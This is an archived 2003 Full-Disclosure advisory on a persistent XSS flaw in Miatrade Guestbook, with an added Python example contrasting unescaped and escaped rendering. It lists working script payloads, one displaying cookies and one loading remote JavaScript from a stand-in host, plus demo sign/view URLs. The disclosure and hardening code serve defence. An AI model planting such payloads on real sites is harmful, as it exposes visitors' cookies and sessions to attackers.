[Full-Disclosure] Miatrade Guestbook - Persistent XSS

From: morning_wood (se_cur_ityat_private)
Date: Sun Aug 24 2003 - 15:12:15 PDT


    ------------------------------------------------------------------
              - EXPL-A-2003-021 exploitlabs.com Advisory 021
    ------------------------------------------------------------------
                              -= Miatrade Guestbook =-
    
    
    
    Aug 20, 2003
    Donnie Werner
    morning_woodat_private
    
    
    Product:
    --------
    Miatrade guestbook
    http://www.miatrade.com
    
    http://www.google.com/keyword/Miatrade+Guestbook
    
    
    Vulnerability:
    ----------------
    1. persistent (stored) XSS
    
    
    Description of product:
    -----------------------
    "Miatrade Guestbook gives you the ability to gather information
     from your visitors. They can post a public message that
     may include: Name, E-mail, url, Home page and Comments
     about your site.
    Miatrade guestbook lets you keep in touch with who's visiting
     your site and is a great way to make your site more
     interactive and keep visitors coming back."
    
    
    VULNERABILITY / EXPLOIT
    ======================
    
    Miatrade guestbook does not filter or encode HTML in user-supplied
     input before storing it and rendering it back to other visitors.
     A remote user can sign the guestbook with a specially crafted
     entry; every time the guestbook is viewed, the stored HTML and
     script are rendered unmodified and executed by the viewing user's
     browser. Because the entry is stored server-side, the attacker
     needs no crafted link: anyone who views the guestbook is affected.
     The code originates from the site running the Miatrade guestbook
     software and runs in the security context (origin, cookies) of
     that site.
    
    
    Persistent XSS is rendered from the following entry fields; the
     payloads below were submitted via sign.pl and executed on view.pl:
    
    [name] - <script>alert("You are vunerable to xss")</script>
    
    [homepage] - <script>document.write(document.cookie)</script>
    
    [message] - <script language="JavaScript"
    src="http://someremote-url/nasty.js" type="text/javascript"></script>
    
    live examples:
    
    demo - sign
    
    http://www.miatrade.com/cgi-bin/guest/sign.pl?fibi
    
    demo - view
    
    http://www.miatrade.com/cgi-bin/guest/view.pl?fibi
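    The following is an added example and is not code from the Miatrade
    product or from the advisory author. It models the behaviour the
    advisory describes in a small Python guestbook: one renderer that
    concatenates stored fields straight into the page (the vulnerable
    pattern) and one that HTML-encodes every field and, in addition,
    restricts the homepage field to http(s) URLs before it is placed in
    an href attribute. The sample entries are constructed here; the three
    script payloads are the ones listed above, and the javascript: URL
    entry is an assumption added to show why encoding alone is not enough
    for a URL that ends up in an attribute. Function names are the
    example's own.

```python
import html
from urllib.parse import urlsplit

# Constructed sample guestbook entries (not data from the Miatrade demo).
# Entry 0 carries the three payloads the advisory lists for [name],
# [homepage] and [message]; entry 1 carries a javascript: URL, which HTML
# escaping does not neutralise once it sits inside an href attribute.
SAMPLE_ENTRIES = [
    {
        "name": 'Alice <script>alert("You are vunerable to xss")</script>',
        "homepage": "<script>document.write(document.cookie)</script>",
        "message": '<script language="JavaScript" '
                   'src="http://someremote-url/nasty.js" '
                   'type="text/javascript"></script>',
    },
    {
        "name": "Bob",
        "homepage": "javascript:alert(document.cookie)",
        "message": "Nice site!",
    },
]


def render_entry_vulnerable(entry):
    """The pattern the advisory describes: each stored field is inserted
    verbatim into the page, so stored HTML runs in every viewer's browser."""
    return (
        f'<p><b>{entry["name"]}</b> '
        f'(<a href="{entry["homepage"]}">homepage</a>)</p>'
        f'<p>{entry["message"]}</p>'
    )


def safe_url(url):
    """Accept only absolute http(s) URLs for the homepage link. Anything
    else (javascript:, data:, inline HTML, relative strings) becomes an
    empty href, so no browser-executable scheme reaches the attribute."""
    candidate = url.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return candidate
    return ""


def render_entry_safe(entry):
    """Hardened rendering: every field is HTML-escaped with quote=True (so
    it is also safe inside attribute values), and the URL field is
    scheme-checked before it is used as an href."""
    name = html.escape(entry["name"], quote=True)
    homepage = html.escape(safe_url(entry["homepage"]), quote=True)
    message = html.escape(entry["message"], quote=True)
    return (
        f'<p><b>{name}</b> (<a href="{homepage}">homepage</a>)</p>'
        f'<p>{message}</p>'
    )


def contains_active_content(rendered_html):
    """Crude self-check: does the rendered page still carry a raw script
    tag or a javascript: URL?"""
    lowered = rendered_html.lower()
    return "<script" in lowered or "javascript:" in lowered


def render_guestbook(entries, renderer):
    """Render all entries with the given per-entry renderer."""
    return "\n".join(renderer(entry) for entry in entries)


if __name__ == "__main__":
    vuln = render_guestbook(SAMPLE_ENTRIES, render_entry_vulnerable)
    safe = render_guestbook(SAMPLE_ENTRIES, render_entry_safe)
    print("vulnerable output carries active content:", contains_active_content(vuln))
    print("hardened output carries active content:  ", contains_active_content(safe))
    print(safe)
```

    The check on the homepage field matters because the advisory shows
    that field being rendered as a link: with only HTML encoding, a
    stored javascript: URL would still be clickable. Output encoding
    must be applied at render time in view.pl rather than relying on
    input filtering in sign.pl alone, since any entry that bypasses the
    input filter is stored permanently and served to every visitor.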
    
    
    
    Local:
    ------
    no
    
    Remote:
    -------
    yes
    
    
    Vendor Fix:
    -----------
    No fix available at time of publication (0day)
    
    
    Vendor Contact:
    ---------------
    Vendor notified concurrently with the release of this advisory
    infoat_private
    
    
    Credits:
    --------
    Donnie Werner
    co-founder / CTO
    e2-labs.com
    morning_wood@e2-labs.com
    
    http://exploitlabs.com
    http://nothackers.org/about.php
    
    
    
    Original advisory at
    http://exploitlabs.com/files/advisories/EXPL-A-2003-021-miatrade-gb.txt
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    



    This archive was generated by hypermail 2b30 : Sun Aug 24 2003 - 15:31:03 PDT